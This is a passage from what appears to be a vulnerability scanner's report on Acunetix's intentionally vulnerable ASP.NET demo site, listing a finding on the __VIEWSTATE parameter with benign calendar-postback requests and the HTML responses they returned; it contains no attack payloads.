</TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:White" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:Black" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1145 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,145 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8134&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA7uO7GdoIZGRk5YnVLlJz2dBioFHCU8AEh4Ripec%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwLAzL4%2BAqDc%2BbwPArrjr%2BwOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY%2FeCQLmnY%2FeCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf%2FDDALmnf%2FDDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne%2B5AwLmne%2B5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU%2FAvuktT8C%2B6Sp0gkC%2B6Sp0gkC%2B6Td9gIC%2B6Td9gIC%2B6TxjQoC%2B6TxjQoC%2B6TloAMC%2B6TloAMC%2B6SZxwwC%2B6SZxwwC%2B6TNrAkC%2B6TNrAkC%2B6ThwwIC%2B6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP%2BQ8C3MuP%2BQ8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL%2F%2BoCAtzL%2F%2BoCAtzL09MPAtzL09MPAtzLx%2FYIAtzLx%2FYIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS%2BckMArHS%2BckMYyQ6JPtfloF4HWCe%2BcaP4mUrboY%3D
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:15:42 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDA7uO7GdoIZGRk5YnVLlJz2dBioFHCU8AEh4Ripec=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLAzL4+AqDc+bwPArrjr+wOAo333M8MAo333M8MAo338OIFAo338OIFAo335LkNAo335LkNAo33mNwGAo33mNwGAo33jPMPAo33jPMPAo33oJYHAo33oJYHAo331CoCjffUKgKN94iSDQKN94iSDQKN97ypBgKN97ypBgLmnY/eCQLmnY/eCQLmnaP1AgLmnaP1AgLmndeJCgLmndeJCgLmncusAwLmncusAwLmnf/DDALmnf/DDALmnZPmBQLmnZPmBQLmnYe9DQLmnYe9DQLmnbvQBgLmnbvQBgLmne+5AwLmne+5AwLmnYPcDALmnYPcDAL7pO3FDwL7pO3FDwL7pIGYBwL7pIGYBwL7pLU/AvuktT8C+6Sp0gkC+6Sp0gkC+6Td9gIC+6Td9gIC+6TxjQoC+6TxjQoC+6TloAMC+6TloAMC+6SZxwwC+6SZxwwC+6TNrAkC+6TNrAkC+6ThwwIC+6ThwwIC3Mvz6AUC3Mvz6AUC3Mvnjw0C3Mvnjw0C3MubogYC3MubogYC3MuP+Q8C3MuP+Q8C3MujnAcC3MujnAcC3MvXMALcy9cwAtzLy9cJAtzLy9cJAtzL/+oCAtzL/+oCAtzL09MPAtzL09MPAtzLx/YIAtzLx/YIArHS0Z8KArHS0Z8KArHSxbIDArHSxbIDArHS+ckMArHS+ckMYyQ6JPtfloF4HWCe+caP4mUrboY=" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD id="tdPageData" valign="top"> </TD> <TD vAlign="top" width="200"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8095')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">April 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8156')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8121')" style="color:Black" title="March 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8122')" style="color:Black" title="March 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8123')" style="color:Black" title="March 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8124')" style="color:Black" title="March 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8125')" style="color:Black" title="March 31">31</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8126')" style="color:Black" title="April 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8127')" style="color:Black" title="April 02">2</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8128')" style="color:Black" title="April 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8129')" style="color:Black" title="April 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8130')" style="color:Black" title="April 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8131')" style="color:Black" title="April 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8132')" style="color:Black" title="April 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8133')" style="color:Black" title="April 08">8</a></td><td align="center" style="color:White;background-color:Silver;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8134')" style="color:White" title="April 09">9</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8135')" style="color:Black" title="April 10">10</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8136')" style="color:Black" title="April 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8137')" style="color:Black" title="April 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8138')" style="color:Black" title="April 13">13</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8139')" style="color:Black" title="April 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8140')" style="color:Black" title="April 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8141')" style="color:Black" title="April 16">16</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8142')" style="color:Black" title="April 17">17</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8143')" style="color:Black" title="April 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8144')" style="color:Black" title="April 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8145')" style="color:Black" title="April 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8146')" style="color:Black" title="April 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8147')" style="color:Black" title="April 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8148')" style="color:Black" title="April 23">23</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8149')" style="color:Black" title="April 24">24</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8150')" style="color:Black" title="April 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8151')" style="color:Black" title="April 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8152')" style="color:Black" title="April 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8153')" style="color:Black" title="April 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8154')" style="color:Black" title="April 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8155')" style="color:Black" title="April 30">30</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8156')" style="color:Black" title="May 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8157')" style="color:Black" title="May 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8158')" style="color:Black" title="May 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8159')" style="color:Black" title="May 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8160')" style="color:Black" title="May 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8161')" style="color:Black" title="May 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8162')" style="color:Black" title="May 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="2"> </TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;position:absolute;left:30%;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/default.aspx
Method	POST
Parameter	__VIEWSTATE
Attack
Evidence
Show / hide Request and Response
Request Header - size: 581 bytes.	POST http://testaspnet.vulnweb.com/default.aspx HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Content-Length: 1125 Origin: http://testaspnet.vulnweb.com Connection: keep-alive Referer: http://testaspnet.vulnweb.com/default.aspx Cookie: ASP.NET_SessionId=muid3q45ssyhyr55mj4gu4zc Upgrade-Insecure-Requests: 1
Request Body - size: 1,125 bytes.	__EVENTTARGET=RightPanel1%24Calendar&__EVENTARGUMENT=8138&__VIEWSTATE=%2FwEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAlY3gHNoIZGRk14hIUikazls4%2BLBMvzH31lChVaE%3D&__VIEWSTATEGENERATOR=CA0B0334&__EVENTVALIDATION=%2FwEWVwKYk%2F%2FGBAKg3Pm8DwK646%2FsDgKN99zPDAKN99zPDAKN9%2FDiBQKN9%2FDiBQKN9%2BS5DQKN9%2BS5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3%2FwwwC5p3%2FwwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC%2B6TtxQ8C%2B6TtxQ8C%2B6SBmAcC%2B6SBmAcC%2B6S1PwL7pLU%2FAvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8%2BgFAtzL8%2BgFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj%2FkPAtzLj%2FkPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy%2F%2FqAgLcy%2F%2FqAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJD5CUpV5K4fad%2BRRSXgmqGO%2B56M
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 05:27:23 GMT Content-Length: 12478
Response Body - size: 12,478 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>acublog news</title> <META http-equiv="Content-Type" content="text/html; charset=windows-1252"> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="default.aspx" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgQCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgUPZBYCZg88KwAKAQAPFgQeC1Zpc2libGVEYXRlBgDAoJByE9oIHgJTRBYBBgDAlY3gHNoIZGRk14hIUikazls4+LBMvzH31lChVaE=" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKYk//GBAKg3Pm8DwK646/sDgKN99zPDAKN99zPDAKN9/DiBQKN9/DiBQKN9+S5DQKN9+S5DQKN95jcBgKN95jcBgKN94zzDwKN94zzDwKN96CWBwKN96CWBwKN99QqAo331CoCjfeIkg0CjfeIkg0Cjfe8qQYCjfe8qQYC5p2P3gkC5p2P3gkC5p2j9QIC5p2j9QIC5p3XiQoC5p3XiQoC5p3LrAMC5p3LrAMC5p3/wwwC5p3/wwwC5p2T5gUC5p2T5gUC5p2HvQ0C5p2HvQ0C5p270AYC5p270AYC5p3vuQMC5p3vuQMC5p2D3AwC5p2D3AwC+6TtxQ8C+6TtxQ8C+6SBmAcC+6SBmAcC+6S1PwL7pLU/AvukqdIJAvukqdIJAvuk3fYCAvuk3fYCAvuk8Y0KAvuk8Y0KAvuk5aADAvuk5aADAvukmccMAvukmccMAvukzawJAvukzawJAvuk4cMCAvuk4cMCAtzL8+gFAtzL8+gFAtzL548NAtzL548NAtzLm6IGAtzLm6IGAtzLj/kPAtzLj/kPAtzLo5wHAtzLo5wHAtzL1zAC3MvXMALcy8vXCQLcy8vXCQLcy//qAgLcy//qAgLcy9PTDwLcy9PTDwLcy8f2CALcy8f2CAKx0tGfCgKx0tGfCgKx0sWyAwKx0sWyAwKx0vnJDAKx0vnJDJD5CUpV5K4fad+RRSXgmqGO+56M" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" 